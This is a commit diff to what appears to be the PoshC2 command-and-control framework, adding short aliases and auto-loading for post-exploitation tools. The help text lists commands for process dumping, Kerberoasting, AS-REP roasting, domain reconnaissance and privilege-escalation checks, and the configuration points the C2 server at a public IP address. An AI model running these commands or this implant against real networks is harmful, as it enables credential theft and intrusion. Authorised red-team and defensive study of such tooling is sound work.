Add aliases for common sharp commands

2019-04-30 15:19:25 +01:00 · 2019-04-30 15:19:25 +01:00 · 6fc1980a2d
parent 56ed8c6ee1
commit 6fc1980a2d
7 changed files with 58 additions and 45 deletions
--- a/Alias.py
+++ b/Alias.py
@ -14,6 +14,15 @@ py_alias = [
 # C# Implant
 cs_alias = [
    ["s","get-screenshot"],
-    ["safetydump", "run-exe SafetyDump.Program SafetyDump"],
-    ["seatbelt", "run-exe Seatbelt.Program Seatbelt all"]
+]
+
+# Parts of commands to replace if command starts with the key
+cs_replace = [
+    ["safetydump", "run-exe SafetyDump.Program SafetyDump"],
+    ["sharpup", "run-exe SharpUp.Program SharpUp"],
+    ["seatbelt", "run-exe Seatbelt.Program Seatbelt"],
+    ["rubeus", "run-exe Rubeus.Program Rubeus"],
+    ["sharpview", "run-exe SharpView.Program SharpView"],
+    ["sharphound", "run-exe Sharphound2.Sharphound Sharphound"],
+    ["watson", "run-exe Watson.Program Watson"]
 ]
--- a/AutoLoads.py
+++ b/AutoLoads.py
@ -132,4 +132,10 @@ def run_autoloads(command, randomuri, user):
  if "remove-wmievent" in command.lower(): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user)
  if "invoke-wmi" in command.lower(): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
  if "get-lapspasswords" in command.lower(): check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user)
-  if command.lower().strip().startswith("seatbelt"): check_module_loaded("Seatbelt.exe", randomuri, user)
+  if command.lower().strip().startswith("run-exe seatbelt"): check_module_loaded("Seatbelt.exe", randomuri, user)
+  if command.lower().strip().startswith("run-exe sharpup"): check_module_loaded("SharpUp.exe", randomuri, user)
+  if command.lower().strip().startswith("run-exe safetydump"): check_module_loaded("SafetyDump.exe", randomuri, user)
+  if command.lower().strip().startswith("run-exe rubeus"): check_module_loaded("Rubeus.exe", randomuri, user)
+  if command.lower().strip().startswith("run-exe sharpview"): check_module_loaded("SharpView.exe", randomuri, user)
+  if command.lower().strip().startswith("run-exe watson"): check_module_loaded("Watson.exe", randomuri, user)
+  if command.lower().strip().startswith("run-exe sharphound"): check_module_loaded("SharpHound.exe", randomuri, user)
--- a/Config.py
+++ b/Config.py
@ -7,7 +7,7 @@ PORT_NUMBER = 443 # This is the bind port

 POSHDIR = "/opt/PoshC2_Python/"
 ROOTDIR = "/opt/PoshC2_Project/"
-HostnameIP = "https://192.168.233.1"
+HostnameIP = "https://193.36.15.234"
 DomainFrontHeader = "" # example df.azureedge.net
 DefaultSleep = "5s"
 Jitter = 0.20
--- a/Help.py
+++ b/Help.py
@ -69,7 +69,6 @@ help
 searchhelp listmodules
 label-implant <newlabel>
 back
-safetydump

 Migration
 ===========
@ -87,49 +86,38 @@ stop-keystrokes
 testadcredential domain username password
 testlocalcredential username password
 cred-popper
-loadmodule SharpUp.exe
-run-exe SharpUp.Program SharpUp
+sharpup
+seatbelt all
+seatbelt BasicOSInfo
+seatbelt SysmonConfig
+seatbelt PowerShellSettings
+seatbelt RegistryAutoRuns
+watson

-Privilege Escalation:
-=======================
-seatbelt
-loadmodule Seatbelt.exe
-run-exe Seatbelt.Program Seatbelt all
-run-exe Seatbelt.Program Seatbelt BasicOSInfo
-run-exe Seatbelt.Program Seatbelt SysmonConfig
-run-exe Seatbelt.Program Seatbelt PowerShellSettings
-run-exe Seatbelt.Program Seatbelt RegistryAutoRuns
-
-Credentials / Tokens / Local Hashes (Must be SYSTEM):
-=========================================================
+Process Dumping:
+================
 safetydump
 safetydump <pid>

 Network Tasks / Lateral Movement:
 ====================================
-loadmodule Rubeus.exe
-run-exe Rubeus.Program Rubeus kerberoast
-run-exe Rubeus.Program Rubeus asreproast /user:username
-
-Network Tasks / Lateral Movement:
-====================================
-loadmodule SharpView.exe
-run-exe SharpView.Program SharpView Get-NetUser -SamAccountName ben
-run-exe SharpView.Program SharpView Get-NetGroup -Name *admin* -Domain -Properties samaccountname,member -Recurse
-run-exe SharpView.Program SharpView Get-NetGroupMember -LDAPFilter GroupName=*Admins* -Recurse -Properties samaccountname
-run-exe SharpView.Program SharpView Get-NetUser -Name deb -Domain blorebank.local
-run-exe SharpView.Program SharpView Get-NetSession -Domain blorebank.local
-run-exe SharpView.Program SharpView Get-DomainController -Domain blorebank.local
-run-exe SharpView.Program SharpView Get-DomainUser -LDAPFilter samaccountname=ben -Properties samaccountname,mail
-run-exe SharpView.Program SharpView Get-DomainUser -AdminCount -Properties samaccountname
-run-exe SharpView.Program SharpView Get-DomainComputer -LDAPFilter operatingsystem=*2012* -Properties samaccountname
-run-exe SharpView.Program Sharpview Find-InterestingFile -Path c:\\users\\ -Include *exe*
-run-exe SharpView.Program SharpView Find-InterestingDomainShareFile -ComputerName SERVER01
+rubeus kerberoast
+rubeus asreproast /user:username
+sharpview Get-NetUser -SamAccountName ben
+sharpview Get-NetGroup -Name *admin* -Domain -Properties samaccountname,member -Recurse
+sharpview Get-NetGroupMember -LDAPFilter GroupName=*Admins* -Recurse -Properties samaccountname
+sharpview Get-NetUser -Name deb -Domain blorebank.local
+sharpview Get-NetSession -Domain blorebank.local
+sharpview Get-DomainController -Domain blorebank.local
+sharpview Get-DomainUser -LDAPFilter samaccountname=ben -Properties samaccountname,mail
+sharpview Get-DomainUser -AdminCount -Properties samaccountname
+sharpview Get-DomainComputer -LDAPFilter operatingsystem=*2012* -Properties samaccountname
+sharpview Find-InterestingFile -Path c:\\users\\ -Include *exe*
+sharpview Find-InterestingDomainShareFile -ComputerName SERVER01

 Bloodhound:
 =============
-loadmodule SharpHound.exe
-run-exe Sharphound2.Sharphound Sharphound --ZipFileName c:\\temp\\test.zip --JsonFolder c:\\temp\\
+sharphound --ZipFileName c:\\temp\\test.zip --JsonFolder c:\\temp\\
 """

 posh_help1 = """
@ -462,4 +450,5 @@ SHARPCOMMANDS = ["get-userinfo","stop-keystrokes","get-keystrokes","delete","mov
 "download-file","get-content","ls-recurse","turtle","cred-popper","resolveip","resolvednsname","testadcredential",
 "testlocalcredential","get-screenshot","modulesloaded","get-serviceperms","unhide-implant","arpscan","ls","pwd","dir",
 "inject-shellcode","start-process","run-exe","run-dll","hide-implant","help","searchhelp","listmodules","loadmodule",
-"loadmoduleforce","back","ps","beacon","setbeacon","kill-implant","get-screenshotmulti", "safetydump", "seatbelt"]
+"loadmoduleforce","back","ps","beacon","setbeacon","kill-implant","get-screenshotmulti", "safetydump", "seatbelt", "sharpup",
+"sharphound", "rubeus", "sharpview", "watson"]
--- a/PSHandler.py
+++ b/PSHandler.py
@ -25,8 +25,8 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre

    # alias mapping
    for alias in ps_alias:
-      if alias[0] == command.lower()[:len(command.rstrip())]:
-        command = alias[1]
+      if command.lower().strip().startswith(alias[0]):
+        command.replace(alias[0], alias[1])

    # opsec failures
    for opsec in ps_opsec:
--- a/SharpHandler.py
+++ b/SharpHandler.py
@ -1,9 +1,9 @@
 import base64, re, traceback, os
-from Alias import cs_alias
+from Alias import cs_alias, cs_replace
 from Colours import Colours
 from Utils import randomuri, validate_sleep_time
 from DB import new_task, update_sleep, update_label, unhide_implant, kill_implant, get_implantdetails, get_pid
-from AutoLoads import check_module_loaded
+from AutoLoads import check_module_loaded, run_autoloads
 from Help import sharp_help1
 from Config import ModulesDirectory, POSHDIR
 from Core import readfile_with_completion
@ -19,7 +19,14 @@ def handle_sharp_command(command, user, randomuri, startup):
    for alias in cs_alias:
        if alias[0] == command.lower()[:len(command.rstrip())]:
          command = alias[1]
-        
+
+     # alias replace
+    for alias in cs_replace:
+      if command.lower().strip().startswith(alias[0]):
+        command = command.replace(alias[0], alias[1])   
+
+    run_autoloads(command, randomuri, user)
+
    if "searchhelp" in command.lower():
        searchterm = (command.lower()).replace("searchhelp ","")
        import string
--- a/changelog.txt
+++ b/changelog.txt
@ -16,6 +16,8 @@ Add NotificationsProjectName in Config.py which is displayed in notifications me
 Add fpc script which searches the Posh DB for a particular command
 Use pyreadline for Windows compatibility
 Modify InjectShellcode logged command to remove base64 encoded shellcode and instead just log loaded filename
+Add Windows install script
+Add aliases for common sharp modules

 4.8 (13/02/19)
 ==============